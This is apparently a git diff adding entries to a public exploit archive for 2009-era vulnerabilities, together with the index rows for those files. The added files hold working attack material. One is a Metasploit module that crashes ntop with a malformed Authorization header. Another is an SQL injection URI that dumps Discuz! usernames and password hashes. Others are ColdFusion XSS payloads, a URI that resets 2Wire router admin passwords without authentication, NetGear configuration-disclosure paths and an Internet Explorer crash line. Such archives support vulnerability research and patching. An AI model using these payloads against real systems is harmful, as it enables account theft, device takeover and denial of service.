diff --git a/files.csv b/files.csv
index d5558c54a..447d1b926 100755
--- a/files.csv
+++ b/files.csv
@@ -29898,3 +29898,17 @@ id,file,description,date,author,platform,type,port
 33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0
 33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
 33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
+33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0
+33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0
+33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0
+33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0
+33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability 
(1)",2007-02-07,trevordixon,windows,dos,0
+33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0
+33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0
+33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0
+33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
+33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0
diff --git a/platforms/asp/webapps/33171.txt b/platforms/asp/webapps/33171.txt
new file mode 100755
index 000000000..91ed77f3e
--- /dev/null
+++ b/platforms/asp/webapps/33171.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36049/info
+
+DUgallery is prone to an authentication-bypass vulnerability.
+
+An attacker can exploit this issue to gain unauthorized administrative access to the affected application. Successfully exploiting this issue will lead to other attacks.
+
+DUgallery 3.0 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+
+http://www.example.com/Accessories/admin/edit.asp?iPic=[PictureID]
\ No newline at end of file
diff --git a/platforms/cfm/webapps/33167.txt b/platforms/cfm/webapps/33167.txt
new file mode 100755
index 000000000..136b27161
--- /dev/null
+++ b/platforms/cfm/webapps/33167.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Adobe ColdFusion 8.0.1 and earlier are vulnerable.
+
+http://www.example.com:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'">
\ No newline at end of file
diff --git a/platforms/cfm/webapps/33168.txt b/platforms/cfm/webapps/33168.txt
new file mode 100755
index 000000000..d3b85ef83
--- /dev/null
+++ b/platforms/cfm/webapps/33168.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Adobe ColdFusion 8.0.1 and earlier are vulnerable.
+
+http://www.example.com:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E
\ No newline at end of file
diff --git a/platforms/cfm/webapps/33169.txt b/platforms/cfm/webapps/33169.txt
new file mode 100755
index 000000000..3125abaa7
--- /dev/null
+++ b/platforms/cfm/webapps/33169.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Adobe ColdFusion 8.0.1 and earlier are vulnerable.
+
+http://www.example.com:8500/CFIDE/wizards/common/_logintowizard.cfm?>'">
\ No newline at end of file
diff --git a/platforms/cfm/webapps/33170.txt b/platforms/cfm/webapps/33170.txt
new file mode 100755
index 000000000..56cc1efe2
--- /dev/null
+++ b/platforms/cfm/webapps/33170.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Adobe ColdFusion 8.0.1 and earlier are vulnerable.
+
+http://www.example.com:8500/CFIDE/administrator/enter.cfm?>'">
\ No newline at end of file
diff --git a/platforms/hardware/remote/33165.txt b/platforms/hardware/remote/33165.txt
new file mode 100755
index 000000000..8e003cc8d
--- /dev/null
+++ b/platforms/hardware/remote/33165.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36031/info
+
+Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.
+
+Unauthenticated attackers can leverage this issue to change the router's administrative password. Successful attacks will completely compromise affected devices.
+
+2Wire routers prior to Firmware version 5.29.135.5 are vulnerable.
+
+The following example URIs are available:
+
+http://gateway.example.net?xslt?page=CD35_SETUP_01
+http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512*
\ No newline at end of file
diff --git a/platforms/hardware/remote/33177.txt b/platforms/hardware/remote/33177.txt
new file mode 100755
index 000000000..5c018b97f
--- /dev/null
+++ b/platforms/hardware/remote/33177.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/36076/info
+
+The NetGear WNR2000 is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.
+
+A remote attacker exploit these issues to obtain sensitive information, possibly aiding in further attacks.
+
+NOTE: Information obtained in attacks may be used in exploits targeting the vulnerability covered in BID 36094 (NetGear WNR2000 'upg_restore.cgi' Authentication Bypass Vulnerability).
+
+The WNR2000 with firmware 1.2.0.8 is vulnerable; other firmware versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/router-info.htm
+http://www.example.com/cgi-bin/router-info.htm
+http://www.example.com/cgi-bin/NETGEAR_WNR2000.cfg
\ No newline at end of file
diff --git a/platforms/linux/dos/33176.rb b/platforms/linux/dos/33176.rb
new file mode 100755
index 000000000..b26cf69f9
--- /dev/null
+++ b/platforms/linux/dos/33176.rb
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/36074/info
+
+The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects ntop 3.3.10; other versions may also be affected.
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NTOP <= 3.3.10 Basic Authorization DoS',
+ 'Description' => %q{
+ A denial of service condition can be reached by specifying an invalid value for the Authorization
+ HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on
+ a colon. When no colon exists in the decoded string the username is left at its default NULL value.
+ During the authentication process the length of the username is computed via strlen(), which results
+ in a segmentation fault when it processes the null value.
+ },
+ 'Author' => 'Brad Antoniewicz ',
+ 'License' => MSF_LICENSE,
+ 'Version' => '1',
+ 'References' => [
+ [ 'BID', 'None'],
+ [ 'CVE', 'CVE-2009-2732']
+
+ ],
+ 'DisclosureDate' => 'Aug 08 2009'))
+ register_options( [Opt::RPORT(3000),], self.class )
+
+ end
+
+ def run
+ begin
+ o = {
+ 'uri' => '/configNtop.html',
+ 'headers' => {
+ 'Authorization' => 'Basic A=='
+ }
+ }
+
+ c = connect(o)
+ c.send_request(c.request_raw(o))
+
+ print_status("Request sent to #{rhost}:#{rport}")
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_status("Couldn't connect to #{rhost}:#{rport}")
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+end
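Review bot: The `'References'` list in `initialize` records `[ 'BID', 'None'],` even though the `source:` line at the head of the same file points at BID 36074, so the module's own metadata contradicts its stated provenance; the entry should read `[ 'BID', '36074'],`. The `'Description'` block also misspells "receives" as "recieves". The `'Author'` value `'Brad Antoniewicz '` ends in a stray trailing space, which looks like a contact address that was stripped on the way in; worth confirming against the original submission and either restoring it or trimming the string.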
diff --git a/platforms/multiple/remote/33164.txt b/platforms/multiple/remote/33164.txt
new file mode 100755
index 000000000..6bcc12354
--- /dev/null
+++ b/platforms/multiple/remote/33164.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/36023/info
+
+WebKit is prone to a remote buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected.
+
+
+Example 1:
+---------
+
+---------
+
+Example 2:
+---------
+
+---------
\ No newline at end of file
diff --git a/platforms/php/webapps/33166.txt b/platforms/php/webapps/33166.txt
new file mode 100755
index 000000000..1a658e75a
--- /dev/null
+++ b/platforms/php/webapps/33166.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36044/info
+
+Discuz! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Discuz! 6.0 is affected; other versions may also be vulnerable.
+
+The following example URI is available:
+
+http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
\ No newline at end of file
diff --git a/platforms/php/webapps/33178.txt b/platforms/php/webapps/33178.txt
new file mode 100755
index 000000000..ec5025cc5
--- /dev/null
+++ b/platforms/php/webapps/33178.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36086/info
+
+Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks.
+
+We don't know which versions of SiteMinder are affected. We will update this BID when more details become available.
+
+http://www.example.com/app/function?foo=bar%00
diff --git a/platforms/windows/dos/33173.html b/platforms/windows/dos/33173.html
new file mode 100755
index 000000000..b32938c13
--- /dev/null
+++ b/platforms/windows/dos/33173.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+
+Versions prior to Internet Explorer 8 beta 2 are vulnerable.
+
+ IE Crash Example
\ No newline at end of file
diff --git a/platforms/windows/dos/33174.html b/platforms/windows/dos/33174.html
new file mode 100755
index 000000000..057442129
--- /dev/null
+++ b/platforms/windows/dos/33174.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+
+Versions prior to Internet Explorer 8 beta 2 are vulnerable.
+
+ IE crash bug

IE crash bug test

\ No newline at end of file
diff --git a/platforms/windows/dos/33175.txt b/platforms/windows/dos/33175.txt
new file mode 100755
index 000000000..c0da8e8e5
--- /dev/null
+++ b/platforms/windows/dos/33175.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+
+Versions prior to Internet Explorer 8 beta 2 are vulnerable.
+
+document.createElement('li').setattribute('value', 'KillIE7');